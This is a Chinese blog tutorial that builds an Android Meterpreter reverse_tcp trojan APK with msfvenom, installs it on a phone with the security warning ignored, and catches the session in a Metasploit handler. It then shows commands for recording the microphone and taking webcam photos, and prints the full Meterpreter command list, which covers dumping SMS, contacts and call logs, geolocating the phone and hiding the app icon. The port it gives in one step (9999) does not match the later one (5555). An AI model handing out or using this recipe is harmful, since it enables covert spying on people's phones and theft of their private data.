2020-08-08

[|>>>*网络安全法<<<|](https://baike.baidu.com/item/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/16843044?fr=aladdin)<font color=red>警告:请勿用于非法用途，后果自负!</font>

[本人主博客](https://www.cnblogs.com/hugboy/)

#0.环境
+ *虚拟机 KaliLinux*
+ *手机 Redmi 6A*
+ *同一局域网下*

#1.查看控制端IP
```
ifconfig
```

即192.168.xx.xxx
#2.生成木马程序
```
>>>msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxx lport=9999 R>/home/hugboy/桌面/Share/hugboyMsf.apk
```
-设置监听端主机lhost=192.168.xx.xxx
-设置监听端主机端口lhost=5555
-保存到指定目录R>/home/hugboy/桌面/hugboyMsf.apk
自动生成了一个10179 bytes 大小的程序

#3.把hugboyMsf.apk安装到目标手机并运行
##1).如何让虚拟机与主机数据分享，进而发送到手机上安装？
>安装VMtools直接拖到本地桌面
>Apt update
>Apt install open-vm-tools-desktop fuse
>Reboot
>重启生效
##2).发送到手机安装，忽略警告，点击继续。。。

#4.打开metasploit工具

#5.设置payload
```
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.xx.xxx
set LPORT 5555
```
```
exploit
```

#6.显示meterpreter>说明连接成功
##常用命令
+麦克风
-record_mic 从麦克风huhugb录制音频X秒
-h 帮助
-d 记录秒数
-F 音频保存路径，默认 HOME/xxxx.wav
-p 自动播放捕获的音频
+webcam_list 列出手机摄像头个数
+webcam_snap 从指定摄像头拍摄照片
-h 帮助
-I 选择要使用的摄像头
-p 图片路径，默认HOME/xxxx.jpeg
-q 图片质量，默认为50
-v 自动查看图片
+webcam_chat 开始视频聊天
+webcam_stream 从摄像拍摄视频
##演示
列出设备的摄像头
```
webcma_list
```

选择第一个摄像头(后置摄像头)拍照
```
webcam_snap -i 1
```



##全部命令
```
help
```
Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    screenshare   Watch the remote user's desktop in real time
    screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system

Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information

Application Controller Commands
===============================

    Command        Description
    -------        -----------
    app_install    Request to install apk file
    app_list       List installed apps in the device
    app_run        Start Main Activty for package name
    app_uninstall  Request to uninstall application

本文地址：https://blog.csdn.net/qq_45809480/article/details/107885560